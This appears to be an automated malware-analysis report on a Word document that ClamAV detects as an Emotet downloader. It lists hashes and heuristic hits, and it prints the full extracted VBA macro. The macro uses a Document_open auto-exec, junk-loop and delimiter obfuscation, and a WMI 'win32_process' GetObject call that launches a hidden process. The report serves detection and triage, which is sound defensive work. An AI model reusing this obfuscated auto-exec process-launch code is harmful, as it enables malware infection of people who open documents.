Office (OOXML) malware analysis — malicious · 1cc000b5add88743

MALICIOUS

Office (OOXML)

133.0 KB Created: 2020-01-23 18:26:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-01-11

MD5: c1df12b207eead2350427b244b0e8413 SHA-1: 24cb4cc05fc3aed6b399795dbec2999c9779b635 SHA-256: 1cc000b5add887431ea2b2173d761ed3e0e50faa14b97ff52fdca3af90f0c83e

230 Risk Score

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7560997-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7560997-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set Gdfsmrtdqifhu = GetObject(Bylaccisvd)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	15146 bytes
SHA-256: `ca8a7ba618812c5f1de48aad1c09f04047368dbb099253568ea7c808b9427f28`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Rvfbfpswwq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Bafperwcblnu.Dreumbnwjv (s) End Sub Attribute VB_Name = "Pcqdyltu" Attribute VB_Base = "0{9F82E64D-78F8-4533-B62F-9888866387FB}{342FCDC1-375B-4FCE-828B-5B1291E1C73C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Xheabtdldrqu" Attribute VB_Base = "0{924020D4-ADD4-447D-A5C1-E6F5A6DB17E5}{51BE0E80-ED35-4F5C-93C8-80395A0F44AB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Yfvhkupeyw" Attribute VB_Base = "0{9EB7A6B2-FF1C-4B32-AFC1-332E90DD52A1}{00DBCD15-FF9E-46FD-8657-FB1D293432E7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Gogqrtrbrg" Attribute VB_Base = "0{7D27D8B4-EB78-440A-B2E2-25511DD8AC16}{A1B6FE52-A980-447F-93F1-84CA9E7B5DC9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Pcebwruopxua" Attribute VB_Base = "0{54CE08BC-3BA1-43BD-BF92-4267CD854C41}{E70F14D7-84DB-481F-B63E-43A928C9E019}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Zjdsihcsno" Attribute VB_Base = "0{507B41D8-CBCA-4A2C-B8F4-8D3EA796BBC9}{0FCF05D1-ED85-491C-952A-0AF218BCD0E4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Axcgtrdari" Attribute VB_Base = "0{ED1E353E-FBE9-4027-8F56-327BBF54EC41}{99184647-3524-426D-B0A9-584FB42A1582}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ihcjtitfuit" Attribute VB_Base = "0{845F9061-E7FA-487D-B541-E7A97463B444}{FE1FDED3-7D8F-4529-B20E-7CA989824819}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Zyttwopxkrwmi" Attribute VB_Base = "0{C1C36EB0-C815-42C2-A301-760FC3C97EE1}{44B0B4D4-11AB-43F8-B49C-10467AEF28D8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Xvrrtpkb" Attribute VB_Base = "0{83FB3827-EFA1-4AA7-88F3-91F91C421FD2}{9CCE5C89-9AF0-4725-A0CC-6D725498B380}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Zevzsseuittj" Attribute VB_Base = "0{EFD1CE43-7377-4143-A996-858DA2ED930D}{7869BF90-FE2C-4D4A-810C-D8FC42CB5538}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Tbqypgxleriy" Attribute VB_Base = "0{D2B64042-CB25-4A5D-903A-6D5E33BC0D85}{3C8841DE-2EC9-40DA-936D-B20730849726}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Oiowoaxk" Attribute VB_Base = "0{25344816-F635-4DF5-8725-56BD9B97FE50}{8F1DC272-8EDE-493C-AE35-1D01092EB813}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Szsrzkinowysz" Attribute VB_Base = "0{0428707B-1FEC-4347-84B1-944A979074D8}{A63DC3ED-CB67-4F56-8DDB-8EAC89A0DB74}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Zvnadqtbcg" Attribute VB_Base = "0{DB93F9B9-086A-4B28-AB4E-A8DF312978C1}{52BF5E6B-A26B-4580-A189-F8FE73754A0E}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Wuhxigsfq" Attribute VB_Base = "0{59E81CF9-2241-43E8-9ABE-C12B14D72EC9}{19A6FBC8-0181-47CC-9FF1-1273FA270060}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ltivjtcwi" Attribute VB_Base = "0{F0FD15E6-F4F9-4FD6-B44D-82973091D99F}{1A9B0324-59A9-4C54-9C80-4E37365AEC27}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Pejjqhyxpl" Attribute VB_Base = "0{451692CD-DD21-4933-A749-B497006509F4}{54F269A8-A0DC-4C27-9D90-78C8B36D321C}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Lshzplggu" Attribute VB_Base = "0{7830265D-B8ED-4B26-A586-5083679786FC}{83EAEBE0-8EBC-4EB0-B2DE-D2256067200D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Cgvvjizjscl" Attribute VB_Base = "0{1B3A6C70-534B-4FFD-815E-AD9915391A57}{B3D7B128-70ED-4206-A696-6DA5531A2736}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Nzqkhtxt" Attribute VB_Base = "0{B0E9F078-0505-4D3B-9219-EAC9AF240F3E}{7DEA772E-B93F-42C8-9169-97A81626085B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Wcctnkbwqeo" Attribute VB_Base = "0{40E35F84-A513-4616-9B86-7B9A9DD629B6}{91BA5B7F-8588-4EBA-884E-F78D8A4ED3B9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Bafperwcblnu" Function Apkfpxdi() Do While Refshjmume = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Zsixwexicec = ChrW(ijs + wdKeyP + dwf) Do While Yfmxxhkti = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Zukdiwimag = Zsixwexicec + Pcqdyltu.Fjnjyssoi + Pcqdyltu.Uaswlqntisue Do While Vrofwzils = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop dse = Pcqdyltu.Aphzzwbmeka.GroupName Uvenyevxnkwn = Split(Zukdiwimag + CStr(CVar(Trim(dse))), "i_^^najks===///") Do While Zepfpvetmh = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Apkfpxdi = Join(Uvenyevxnkwn, "") Do While Zghywqkx = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop End Function Function Dreumbnwjv(s) dsvw = "i_^^najks===///i_^^najks===///ii_^^najks===///ni_^^najks===///mi_^^najks===///gi_^^najks===///mti_^^najks===///" + ChrW(sd + wdKeyS + de) + ":i_^^najks===///i_^^najks===///wii_^^najks===///i_^^najks===///n3i_^^najks===///2_i_^^najks===///i_^^najks===///" + Pcqdyltu.Iojjxlevc + "i_^^najks===///roci_^^najks===///i_^^najks===///esi_^^najks===///si_^^najks===///i_^^najks===///" Do While Exioryqaxkl = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop iiwn = "i_^^najks===///" Do While Yupwfaagoja = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Vycljlge = Split("i_^^najks===///wi_^^najks===///i_^^najks===///i_^^najks===///" + dsvw + jwd, iiwn) Do While Tgiuydbhqeoa = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Bylaccisvd = Join(Vycljlge, "") Do While Ubweqtuzljkf = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Set Gdfsmrtdqifhu = GetObject(Bylaccisvd) Do While Ppcncqolve = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Axoxxnjpf = Pcqdyltu.Gyvbtiskdl.Tag Qsbkownvl = Bylaccisvd + ChrW(nciwd + wdKeyS) + Pcqdyltu.Rbhkoiylymva.Tag + Axoxxnjpf Do While Ewfmhomkgljd = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Ururopcqkcv = Qsbkownvl + Pcqdyltu.Iojjxlevc Do While Cfjrhzfaqb = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Set Dreumbnwjv = GetObject(Ururopcqkcv) Do While Jjzzzvbvinb = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Dreumbnwjv. _ showwindow = False Do While Tbxylpnmhqurz = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop Do While Gdfsmrtdqifhu. _ Create(wqq & Apkfpxdi, Zhxwssla, Dreumbnwjv, Pznlxkvl, Owtgvfdxdh, Bnebgucku, Cgeykoijm, Ocorbnpoxmu, Ahweajfpsoqaq, Ivyuinzbmotp) Loop Do While Vemvmsfx = 3456 asdwq = (sdf _ - Rnd(3 * CSng(dsfewew) / dsfdsf _ * Round(qweqwe)) + sasddd - Chr(21 - CByte( _ jjskw)) + dffqwhas + CStr(sdfff)) ewewrg = 8 + Fix(34) + 2 / _ iqwhnd * 3 / Rnd(kashd + Rnd(84 * xjjasd * 53 + Sin( _ 769))) / 3 / Chr(4 _ * CStr(qwiqwhd)) / 171 / wqkehnx Loop End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	114688 bytes
SHA-256: `8abb0735a565742207e1b003120f9a1695bd2e7071f5b066424f12b58368e7d3`
Detection ClamAV: Doc.Downloader.Emotet-7560997-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.